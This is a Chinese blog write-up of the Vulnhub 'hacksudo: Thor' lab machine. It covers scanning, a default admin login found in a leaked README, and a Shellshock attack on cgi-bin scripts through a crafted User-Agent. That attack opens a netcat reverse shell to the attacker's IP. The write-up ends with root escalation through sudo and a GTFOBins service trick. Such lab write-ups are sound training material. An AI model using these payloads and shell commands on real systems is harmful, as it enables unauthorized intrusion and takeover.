Vulnhub--hacksudo(thor)靶场

最新推荐文章于 2024-02-09 22:05:06 发布
最新推荐文章于 2024-02-09 22:05:06 发布
阅读量233 收藏
点赞数 1
分类专栏: 每周靶场训练 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leo788/article/details/128890611
版权

hacksudo-thor靶场练习---中

0x00部署

hacksudo-thor靶机:下载地址
宿主机:kali2022
目标:获取root拿到flag文件

0x01信息收集

1.主机发现

$ sudo arp-scan -l
//因为靶机与宿主机在同一网段,所以用二级扫描来发现靶机ip

2.端口扫描

//使用namp命令,-p-指定ip,查看哪些端口开放
$ sudo nmap -p- 靶机ip 
$ sudo nmap -sC -sV -O -p21,80 靶机ip
//-sC常见漏洞脚本扫描
//-sV开放端口服务/版本号
//-O操作系统探测

比较好想到的是,这里只有两个开放端口进行利用,所以流程就是在80端口找一些隐藏路径得到能登录ssh的信息进行提权。

在这里插入图片描述

3.路径爬取

对80端口进行一下路径爬取,寻找隐藏信息

$ dirsearch -u http://ip  //没什么特别的结果,继续
$ dirsearch -u http://ip -f -e php,txt,html   //指定扩展名
$ dirsearch -u http://ip -w /usr/share/seclists/Discovery/web-content/common.txt
//指定字典进行爆破
$ gobuster dir -r -u http://192.168.56.101/site/ -x txt,html,php -w /usr/share/seclists/Discovery/Web-Content/common.txt

使用dirsearch扫描的结果:
在这里插入图片描述

gobuster扫描的结果:
在这里插入图片描述
检查扫描出的目录:

开源源码泄漏

读取README.md的内容,得到一条有用消息:
在这里插入图片描述

默认帐号密码

即管理员账号名称是admin,密码为password123,访问一下扫描出来的admin_login.php页面–》输入admin,password123–》管理员登录:
在这里插入图片描述
在这里插入图片描述
在用户信息页面得到可用信息:
在这里插入图片描述

业务逻辑漏洞

应用程序逻辑漏洞同样带来极大的问题,本靶机存在:
后台管理员用户没有修改;转账支付密码与登录密码都没有区别。
考虑到cgi-bin路径通常存放.cgi、.sh文件–》破壳漏洞

破壳漏洞

壳即为shell,可以向操作系统输入指令,针对bash调用环境变量的过程中,当环境变量中存在可能存在漏洞的指令,而导致漏洞指令被执行达到破壳的效果。
漏洞导致原因在于早期bash对于环境变量并执行其中的函数变量时,对于函数定义指令的过滤存在问题,所以其中包含的系统指令也会被执行。bash解析环境变量当中引用的函数定义、过滤不清晰。

对扫描出的目录进行检查,其中cgi-bin目录是用来存放cgi程序的目录,cgi程序可用在远程访问服务器时,所以以这个为突破口,对cgi-bin目录进行扫描,指定.cgi格式:
![在这里插入图片描述](https://img-blog.csdnimg.cn/0dfcefe7319646d89602a67f3c38dd86.png
发现了500文件,服务器不知道怎么处理没有携带参数的指令也会响应500请求。
利用nmap的漏洞脚本进行检测,破壳漏洞:

sudo nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/shell.sh,cmd=ls 192.168.56.106
#http-shellshock即为破壳漏洞,检测一下

backup.cgi:
在这里插入图片描述
shell.sh:
在这里插入图片描述
利用curl请求指令向服务器端

curl -H "user-agent: () { : ;}; echo; echo; /bin/bash -c 'which nc'" \http://192.168.56.106/cgi-bin/shell.sh
# 在user-agent头部使用了函数定义,最终请求执行:which nc命令

在这里插入图片描述
再利用nc进行反弹shell

curl -H "user-agent: () { : ;}; echo; echo; /bin/bash -c 'nc -e /bin/bash 192.168.56.102 4444'" \http://192.168.56.106/cgi-bin/shell.sh

成功打点,当前用户为www-data,用pty升级一下当前shell
在这里插入图片描述
sudo -l检查一下sudo权限,发现thor用户可以不用密码使用sudo执行/home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.sh

在这里插入图片描述
hammer.sh的功能中可以通过输入进行指令的执行,这里尝试调用bash
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
对于当前用户的sudo权限查看,发现cat和service都可以使用sudo

GTFOBins提权

GTFOBins参考文档

开源的,操作系统中权限配置不当时通过系统程序提升至root权限
根据文档中sudo权限提权:sudo service ../../bin/bash
在这里插入图片描述
得到flag:一个hammer
在这里插入图片描述

0x02 总结

hacksudo靶机中涉及使用:
利用开源源码泄露以及默认管理员信息、路径爬取获得隐藏页面的登录,发现业务逻辑层面的漏洞。
破壳漏洞的原理重点关注cgi-bin目录,再利用curl向服务器发起nc 命令进行打点
GTFOBins的利用

lexi7a
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HACKSUDO: FOG靶机
logan_logan的博客
05-29 966
1.在浏览器中输入靶机地址; 2.端口扫描 发现开启了FTP服务,说不定在接下来能利用上; nmap -A -p1-65535 10.36.101.169 3.目录枚举 枚举到了一个有意思的txt文件,打开之后怀疑存在FTP登录密码; gobuster dir -e -u http://10.36.101.169 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.html; 忘记截图了,这是用
ThorUI组件库,微信小程序项目代码分享,组件文档地址:https://www.thorui.cn/doc。最近更新时间:2021-01-19 - dingyong0214 / ThorUI
01-26
ThorUI ThorUI组件库小程序原生版本,该开源版源码为V1.4.2版本,后续更新版本付费会员才可使用(¥120/永久)【线上最新版为V1.6.1】。 微信小程序 H5二维码 QQ小程序 Android App ThorUI示例 网站介绍 ThorUI组件文档 交流群 QQ群1:745733024 QQ群2:881906325 QQ群3:605135318 QQ群4:928308676 会员群:加入会员可进 更新日志 V1.6.1 (2021-01-19) 【ThorUI组件库V1.6.1】更新: 1.商城模板更新: 1)商城模板拆分成单独模板项目。 2)个人中心,新增未登录状态。 3)个人信息页面操作优化。 4)编辑地址页面优化,新增省市区城市选择。 5)新增我的钱包页面。 6)新增充值确认页面。 7)新增我的银行卡页面。 8)新增交易记录页面。 9)商品详情页分享优化,新增生成分
Thor Tab-crx插件
03-13
您将在每个新选项卡中打开Thor HD图像! 惊人的! 每个新标签中的真棒高品质Thor图像。 对于真正的粉丝,就像我一样:)您会非常有启发性的,并且您会喜欢这个不错的扩展。 简单易用(只需向下滚动即可查看更酷的照片或打开新标签)。 也可以离线工作。 超级快。 而已。 :)有关控制怪胎的详细信息:*代码中的所有内容都是100%透明的。 -在此处检查:https://github.com/happyheyb/tab-s *不需要奇怪的权限。 *没有间谍软件或其他古怪的东西。 如果您喜欢,请给我一个不错的5星级评论。 谢谢。 对于其他程序员,我们将不胜感激。 谢谢你。 要删除它,您有2个简单的选项:-在地址栏中键入chrome:// extensions,向下滚动并删除它-转到chrome,设置,扩展名,向下滚动并删除它。 免责声明:这个不错的扩展是由粉丝完成的。 商标属于其各自所有者。 支持语言:Bahasa Indonesia,Bahasa Melayu,Deutsch,English,Filipino,Français,Kiswahili,Nederlands,Norsk,Tiếng Việt,Türkçe,català,dansk,eesti,español,español (Latinoamérica),hrvatski,italiano,latviešu,lietuvių,magyar,polski,português (Brasil),português (Portugal),română,slovenský,slovenščina,suomi,svenska,Ελληνικά,Српски,български,русский,українська,עברית,فارسی‎,मराठी,हिन्दी,বাংলা,ગુજરાતી,தமிழ்,తెలుగు,ಕನ್ನಡ,മലയാളം,ไทย,‫العربية,中文 (简体),中文 (繁體),日本語,한국어
cpp-Thor一个用于学习目的简约的操作系统
08-16
Thor – 一个用于学习目的简约的操作系统
2015-THOR-Recode
05-06
2015-THOR-重新编码 这是制作THOR代码的仓库。 这将在淡季比赛中使用。
thor-ragnarok-thor-ragnark_arabic-1708939.zip_RST_ragnarok_regul
07-15
RST DESIGNER IS THE MOST IMPORTANT REGULATOR
靶机渗透练习96-hacksudoThor
hirak0的博客
05-09 1556
靶机描述 靶机地址:https://www.vulnhub.com/entry/hacksudo-thor,733/ Description Box created by vishal Waghmare This box should be easy to medium . This machine was created for the InfoSec Prep Discord Server ( https://discord.gg/kDyAKtJs ) Website (https://hacksud
hacksudo:2 (HackDudo) vulnhub靶场(NFS,vbox靶场环境配置)
weixin_62621015的博客
03-21 437
hacksudo2 vulnhub靶场(NFS,vbox靶场环境配置)
Vulnhub靶场Hacksudo:Aliens
2301_76232299的博客
12-01 5225
信息收集是很重要,思路一步一步的走,就会很轻松了,这个靶机还是蛮有趣了,也不难😁😁😁,有兴趣的可以去玩玩!
带你玩转渗透测试靶场Vulnhub——hacksudo3
m0_74025111的博客
04-24 445
从目录里面发现/hidden/ 我们先去访问一下http://192.168.1.108/hidden,由此发现好像是一个解密的。我们先来访问默认的登录页面:http://192.168.1.108/login.php 竟然发现了这个网页的登录页面。继续访问下一个,http://192.168.1.108/decrypt/ 发现这个也是一个解密的网站。访问:http://192.168.1.108/bruteforce/这也是一个解密用的网站。以上的命令都可以执行的话,证明是存在命令注入漏洞的。
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1
Aluxian_的博客
09-05 2242
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。1.修改/etc/hosts文件 解析网站2.从新学习了一遍定时提权 (主要是回弹的命令)3.还有一些简单的扫码工具 和枚举工具 这靶机其实很简单 因为太久没做了 所以从新温习一下 主要是学习渗透的思路!
ThorUI组件库,轻量、简洁的移动端组件库
02-21
ThorUI组件库,uni-app版本,v3编译,支持nvue uni-app编译模式(原weex编译模式),easycom组件模式(无需手动引入,开发工具自带智能感知) 网站介绍 https://www.thorui.cn/ ThorUI组件文档 ...
vulnhub-XXE漏洞靶机流程(图文+工具包)
qq_45514735的博客
03-05 5765
靶机下载链接 http://download.vulnhub.com/xxe/XXE.zip win下全套工具包 链接:https://pan.baidu.com/s/1joOWbE6823GuFyBm92sR0A 提取码:r0xn 一、首先打开靶机 靶机是不给你账号密码的,为了防止你直接混入系统查找flag,通常密码都会先设置的非常复杂,不要想着破解了。 二、打开nmap对内网进行一次扫描找到靶机 在虚拟机里找到你的内网ip池以及掩码 填入nmap,配置选择Qui......
vulnhub靶场-hacksudo - Thor
qq_42947816的博客
06-30 941
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
vulnhubhacksudo:Thor
weixin_54431413的博客
05-24 552
前期:主机发现端口扫描,服务版本探测, 中期:信息收集,通过源码发现管理员默认密码,发现逻辑漏洞,sql注入等 后期:通过cgi程序利用破壳漏洞成功突破边界,最后利用一些命令配置不当实现成功提权。 此篇最重要的一点就是破壳漏洞和系统逻辑漏洞, 要迟到了,上课去了
Vulnhub靶机:hacksudo-Thor
最新发布
qq_48904485的博客
02-09 916
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:hacksudo-Thor(10.0.2.49)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/hacksudo/hacksudoThor.zip。
hack the box靶场fawn靶机
zr1213159840的博客
03-15 3238
首先打开靶机,回答几个问题 第一个问题:ftp的全称是什么? 答案:File Transfer Protocol 第二个问题:ftp协议的通信模型是什么? 答案:一般由bs和cs两种,ftp是cs的,即client-server model 第三个问题:一种流行的ftpgui程序是什么? 答案:搜了半天,是FileZilla,百度搜流行的ftp程序就能找到 第四个问题:ftp跑在哪个端口,基于什么协议? 答案:ftp是跑在tcp协议之上的,其中21是控制端口,20是数据传输端口,所以说服务跑在哪个端
渗透测试练习靶场hackthebox_Oopsie
qq_45951598的博客
03-31 1971
文章目录扫描路径泄露登录升级shell权限提升后续总结 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -sS -F -sV 10.10.10.28 -sS:半开扫描,Nmap发送SYN包到远程主机,不建立完整的三次握手 -F:快速扫描,扫描一些常用端口 -sV:探测开启的端口来获取服务、版本信息 如图所示,发现其开放了22和80端口,接下来我们用浏览器进入网站(10.10.10.28:80)进行检查 路径泄露 方法一 这里他说要登入,但是我们这里不知道登入口在哪 发现可以登录,但是目前没有
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8295
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
mall-thorui-master
05-16
mall-thorui-master是一个名为ThorUI的项目的组件库。ThorUI是一个基于Vue.js的前端开发框架,提供了大量的现成组件和插件,用于构建Web应用程序。其中,mall-thorui-master是ThorUI框架中用于商城开发的组件库,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值